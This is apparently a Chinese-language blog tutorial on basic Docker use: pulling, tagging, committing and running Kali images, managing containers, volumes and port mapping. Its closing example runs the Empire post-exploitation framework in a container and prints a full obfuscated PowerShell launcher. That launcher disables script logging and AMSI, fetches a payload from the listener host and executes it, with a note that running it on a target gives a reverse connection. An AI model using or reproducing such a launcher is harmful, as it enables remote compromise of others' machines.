Docker笔记—基础篇
Author:zeroyu
概念
Docker镜像:一个只读模板,是创建Docker容器的基础。镜像文件是由多个层组成的。
Docker容器:一个轻量级沙箱,来运行和隔离应用
Docker仓库:用来存储Docker镜像文件的地方
Docker中用于区分的方式是id或者name:tag
安装
操作镜像
1.获取镜像(默认是从docker hub网站进行镜像的获取)
docker pull kalilinux/kali-linux-docker
#如果想使用非官方仓库需要指定仓库完整的地址
docker pull hub.c.163.com/public/ubuntu:14.04建议:使用中科大镜像源 https://docker.mirrors.ustc.edu.cn
2.列出镜像
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GBREPOSITORY:来自哪个仓库
TAG:镜像的标签信息,能标示来自同一仓库的不同镜像
IMAGE ID:镜像的ID,此字段唯一标示了镜像
CREATED:创建时间
SIZE:镜像的大小
3.添加镜像标签
#对kalilinux/kali-linux-docker:latest添加新的标签kalilinux:latest
➜ ~ docker tag kalilinux/kali-linux-docker:latest kalilinux:latest
#别名不一样但是两者的镜像文件是一样的(id相同)
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB4.查看详细信息
➜ ~ docker inspect kalilinux:latest
[
{
"Id": "sha256:8ececeaf404d5d63d4e9bf870f4340516f3be040e5db6c005ac8cf96d2c43536",
"RepoTags": [
"kalilinux/kali-linux-docker:latest",
"kalilinux:latest"
],
"RepoDigests": [
"kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d"
],
......
"Metadata": {
"LastTagTime": "2017-12-02T04:56:53.8185955Z"
}
}
]5.查看镜像历史
➜ ~ docker history kalilinux:latest
IMAGE CREATED CREATED BY SIZE COMMENT
8ececeaf404d 9 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
<missing> 9 months ago /bin/sh -c apt-get -y update && apt-get -y... 251MB
<missing> 9 months ago /bin/sh -c #(nop) ENV DEBIAN_FRONTEND=non... 0B
<missing> 9 months ago /bin/sh -c echo "deb http://http.kali.org/... 134B
<missing> 9 months ago /bin/sh -c #(nop) MAINTAINER steev@kali.org 0B
<missing> 11 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
<missing> 11 months ago /bin/sh -c apt-get -y update && apt-get -y... 286MB6.搜索镜像
#搜索所有自动创建的评价为1+的带kali关键字的镜像
➜ ~ docker search --automated -s 3 kali
Flag --automated has been deprecated, use --filter=is-automated=true instead
Flag --stars has been deprecated, use --filter=stars=3 instead
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
kalilinux/kali-linux-docker Kali Linux Rolling Distribution Base Image 361 [OK]
linuxkonsult/kali-metasploit Kali base image with metasploit 54 [OK]
jasonchaffee/kali-linux Kali Linux Docker Container with the kali-... 8 [OK]
brimstone/kali 6 [OK]
adamoss/kali2-metasploit Kali2 Automated Build 4 [OK]
wsec/kali-metasploit Official Kali Base image + Metasploit 3 [OK]
kalinon/comicstreamer ComicStreamer is a media server app for sh... 3 [OK]7.删除镜像
#如果同一个标签有多个tag,那么docker rmi只是删除tag而已
#如果docker rmi id的话,会先删除所有的tag然后删除镜像
#但是若该镜像的容器存在,也是无法删除的,如果想强制删除可以使用docker rmi -f id
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB
➜ ~ docker rmi kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux latest 8ececeaf404d 9 months ago 1.56GB8.创建镜像
1)基于已有镜像的容器创建
#我们先创建容器并安装metasploit-framework
➜ ~ docker run -it kalilinux:latest /bin/bash
root@de573c5f5dc6:/# apt update && apt install metasploit-framework
root@de573c5f5dc6:/#exit
#记住id为de573c5f5dc6
#docker commit -m "改动信息" -a "作者名称" id REPOSITORY:TAG
➜ ~ docker commit -m "install msf" -a "zeroyu" de573c5f5dc6 kalilinux:0.1
sha256:66a6770d79d88c826b2e4a38b98037c14de0b9d2ce897307dc30afbf675ce51a
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux 0.1 66a6770d79d8 21 seconds ago 2.54GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB2)基于本地模板导入
docker import ...9.存出和载入镜像
1)存出镜像
docker save -o docker_for_msf.tar kalilinux:0.12)载入镜像
docker load --input docker_for_msf.tar
#或则
docker load < docker_for_msf.tar10.上传镜像
docker push kalilinux:0.1操作容器
1.创建容器
1)新建容器
#docker create新建的容器处于静止,可以使用docker start来启动它
#-i 保持标准输入打开 -t分配一个伪终端
➜ ~ docker create -it kalilinux:0.1
2bc48b88a424c8056fe9e6311848d5850c4e46008feec99ee095bc341ae9adaf
#查看处于终止状态的容器
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2bc48b88a424 kalilinux:0.1 "/bin/bash" 7 seconds ago Created frosty_poitras
de573c5f5dc6 kalilinux:latest "/bin/bash" 5 hours ago Exited (0) 5 hours ago happy_goldberg2)启动容器
#docker start id 启动相应的容器
#docker ps 查看运行中的容器
➜ ~ docker start 2bc48b88a424
2bc48b88a424
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2bc48b88a424 kalilinux:0.1 "/bin/bash" 9 minutes ago Up 8 seconds frosty_poitras3)新建并启动容器
#docker run = docker create + docker start
#run的过程:1.检查镜像是否存在,不存在就下载;2.用镜像创建容器;挂载可读写层;3.分配虚拟接口
#4.分配IP;5.运行指定程序;6.执行完自动终止
➜ ~ docker run kalilinux:0.1 /bin/echo 'zeroyu'
zeroyu
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d6a6045c4f8b kalilinux:0.1 "/bin/echo zeroyu" 3 minutes ago Exited (0) 3 minutes ago cocky_kirch
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
#常用命令如下
➜ ~ docker run -it kalilinux:0.1 /bin/bash
root@2ed8aa5354f1:/# ps
PID TTY TIME CMD
1 pts/0 00:00:00 bash
7 pts/0 00:00:00 ps
root@2ed8aa5354f1:/# exit
exit
#推出后自动处于终止状态
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2ed8aa5354f1 kalilinux:0.1 "/bin/bash" About a minute ago Exited (0) 48 seconds ago goofy_bardeen4)守护态运行
#在后台运行容器
➜ ~ docker run -d kalilinux:0.1 /bin/sh -c "while true ; do echo zeroyu ; sleep 1 ; done"
88f12c0725a466ba6d8f08f34fc8e9ac263ecafdff0a9e7282d7e9bb4073e6a0
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
88f12c0725a4 kalilinux:0.1 "/bin/sh -c 'while..." 7 seconds ago Up 7 seconds sleepy_kowalevski
➜ ~ docker logs 88f12c0725a4
zeroyu
zeroyu
zeroyu
......2.终止容器
#id为88f12c0725a4但是可以使用前几位来简单表示
➜ ~ docker stop 88
88
#查看所有处于终止态的id
➜ ~ docker ps -qa
073ff4e1dac7
#处于终止状态可以使用start来重新启动
➜ ~ docker start 073
073
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
073ff4e1dac7 kalilinux:0.1 "/bin/sh -c 'while..." About a minute ago Up About a minute cranky_benz
#restart可以先终止再重新启动
➜ ~ docker restart 073
0733.进入容器
处于守护态(-d参数)的容器会在后台运行,但是你无法到信息,也无法进行操作。此时,要进入容器进行工作,要使用attach或者exec命令。
1) 使用attach命令
#容器还可以使用name来唯一辨识
➜ ~ docker run -itd kalilinux:0.1
77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 20 seconds ago Up 21 seconds stupefied_gates
➜ ~ docker attach stupefied_gates
root@77e93d18a6a5:/#2)使用exec命令
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 5 minutes ago Exited (0) About a minute ago stupefied_gates
➜ ~ docker start 77e
77e
➜ ~ docker exec -it 77e93d18a6a5 /bin/bash
root@77e93d18a6a5:/#4.删除容器
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 7 minutes ago Up About a minute stupefied_gates
➜ ~ docker rm 77e93d18a6a5
Error response from daemon: You cannot remove a running container 77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360. Stop the container before attempting removal or force remove
➜ ~ docker stop 77e93d18a6a5
77e93d18a6a5
➜ ~ docker rm 77e93d18a6a5
77e93d18a6a55.导入和导出容器
#导出容器
#无论这个容器是否正在运行都是可以导出的
➜ ~ docker export -o test.tar 77e93d18a6a5
#或者执行
➜ ~ docker export 77e93d18a6a5 > test.tar
#导入容器
➜ ~ docker import test.tar - test/kalilinux:v1.0Docker数据管理
#使用-v标记挂在本地的tmp目录到容器中的/opt/tmp_test
#使用rw(默认也是这种方式)来指定可读写
#下面的#表示的不是注释
➜ ~ docker run -it -P --name db -v /tmp:/opt/tmp_test:rw kalilinux:0.1 /bin/sh
# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
# cd opt
# ls
tmp_test
# cd tmp_test
# ls
com.apple.launchd.0fGM76e6ao com.apple.launchd.UWfVYRXkwo powerlog
com.apple.launchd.AkQGotnulN pip-FfQw68-unpack zeroyu.txt
#Docker端口映射
#-P是指映射到任意端口
#-p加端口号,则将端口映射到所有地址的相应端口
➜ ~ docker run -it -d -p 5000:5000 kalilinux:v0.2
23e91a40cb124720b1dba81371a275169124cbff2778120b4350470fa79a0d91
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
23e91a40cb12 kalilinux:v0.2 "/bin/bash" 12 seconds ago Up 11 seconds 0.0.0.0:5000->5000/tcp boring_volhard
➜ ~ docker attach boring_volhard
root@23e91a40cb12:/# cd home/Empire/
root@23e91a40cb12:/home/Empire# ls
LICENSE README.md changelog data empire lib setup
root@23e91a40cb12:/home/Empire#附例
在vps中的docker上使用empire进行渗透测试(metasploit同理)
#端口映射参考上条
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
282 modules currently loaded
0 listeners currently active
0 agents currently active
(Empire) > help
Commands
========
agents Jump to the Agents menu.
creds Add/display credentials to/from the database.
exit Exit Empire
help Displays the help menu.
interact Interact with a particular agent.
list Lists active agents or listeners.
listeners Interact with active listeners.
load Loads Empire modules from a non-standard folder.
preobfuscate Preobfuscate PowerShell module_source files
reload Reload one (or all) Empire modules.
reset Reset a global option (e.g. IP whitelists).
resource Read and execute a list of Empire commands from a file.
searchmodule Search Empire module names/descriptions.
set Set a global option (e.g. IP whitelists).
show Show a global option (e.g. IP whitelists).
usemodule Use an Empire module.
usestager Use an Empire stager.
(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True http://172.17.0.2:80 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True 3ab47284cf7e260541d810beb54d3405 Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners/http) > set Name docker
#此处的172.16.188.1为vps的ip地址
(Empire: listeners/http) > set Host http://172.16.188.1:5000
(Empire: listeners/http) > execute
[*] Starting listener 'docker'
[+] Listener successfully started!
(Empire: listeners/http) > lsit
*** Unknown syntax: lsit
(Empire: listeners/http) > back
(Empire: listeners) > list
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
docker http http://172.16.188.1:5000 5/0.0
(Empire: listeners) > usestager
multi/bash osx/dylib osx/teensy windows/launcher_sct
multi/launcher osx/jar windows/bunny windows/launcher_vbs
multi/pyinstaller osx/launcher windows/dll windows/macro
multi/war osx/macho windows/ducky windows/macroless_msword
osx/applescript osx/macro windows/hta windows/teensy
osx/application osx/pkg windows/launcher_bat
osx/ducky osx/safari_launcher windows/launcher_lnk
(Empire: listeners) > usestager windows/d
dll ducky
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher
Description:
Generate a PowerPick Reflective DLL to inject with
stager code.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
StagerRetries False 0 Times for the stager to retry
connecting.
(Empire: stager/windows/dll) > set Listener docker
(Empire: stager/windows/dll) > back
(Empire: listeners) > launcher powershell docker
powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBpAE8AbgBUAEEAYgBMAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBKAE8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAAUwA9AFsAUgBFAGYAXQAuAEEAcwBzAEUATQBCAGwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBFAFQAVgBBAGwAdQBlACgAJABOAFUAbABsACkAOwBJAGYAKAAkAEcAUABTAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAA7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0ARQBMAHMAZQB7AFsAUwBDAHIAaQBQAFQAQgBsAG8AYwBrAF0ALgAiAEcARQBUAEYASQBFAGAAbABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAGwALAAoAE4AZQBXAC0ATwBCAGoAZQBDAFQAIABDAG8ATABsAEUAYwBUAGkAbwBOAHMALgBHAEUATgBlAFIAaQBDAC4ASABBAHMASABTAEUAVABbAFMAdAByAEkAbgBHAF0AKQApAH0AWwBSAEUAZgBdAC4AQQBzAFMARQBtAEIATAB5AC4ARwBFAFQAVAB5AFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAQQBMAFUAZQAoACQAbgB1AGwAbAAsACQAVABSAHUAZQApAH0AOwB9ADsAWwBTAFkAcwB0AEUAbQAuAE4ARQB0AC4AUwBFAFIAdgBpAEMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8AbgB0AGkAbgBVAEUAPQAwADsAJAB3AEMAPQBOAGUAVwAtAE8AQgBqAGUAQwB0ACAAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBiAEMATABJAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBDAC4ASABFAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAE8AWABZAD0AWwBTAFkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAUgBFAFEAVQBlAFMAVABdADoAOgBEAEUAZgBBAHUAbABUAFcAZQBCAFAAcgBPAFgAeQA7ACQAdwBDAC4AUABSAG8AWABZAC4AQwByAGUAZABFAG4AdABpAGEATABzACAAPQAgAFsAUwBZAFMAdABlAE0ALgBOAGUAVAAuAEMAcgBlAGQAZQBuAFQASQBhAGwAQwBhAGMASABlAF0AOgA6AEQAZQBGAGEAVQBMAFQATgBFAFQAVwBvAHIASwBDAHIAZQBEAEUATgB0AEkAYQBMAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUATQAuAFQAZQB4AFQALgBFAE4AQwBPAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAFQAZQBTACgAJwAzAGEAYgA0ADcAMgA4ADQAYwBmADcAZQAyADYAMAA1ADQAMQBkADgAMQAwAGIAZQBiADUANABkADMANAAwADUAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwAxADcAMgAuADEANgAuADEAOAA4AC4AMQA6ADUAMAAwADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABFAEEAZABlAHIAUwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AUgAvAGoAMwAxAEkAYwBRAGQAZQAzAEYANwB2AGoAWABYADIAbgBwADYARQAyAFcAcQBiAGMAPQAiACkAOwAkAEQAYQBUAEEAPQAkAFcAQwAuAEQAbwBXAE4AbABvAEEARABEAGEAVABBACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAEQAQQBUAGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAQQB0AGEAWwA0AC4ALgAkAEQAQQB0AGEALgBsAGUATgBHAHQASABdADsALQBKAE8AaQBuAFsAQwBIAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
#在目标机器上执行上面的payload就可以得到下面的反弹
(Empire: listeners) > [+] Initial agent G3BYNCLW from 172.17.0.1 now active (Sla
转载
分享
发布投稿
优秀作者
帮大忙了(๑•̀ㅂ•́)و✧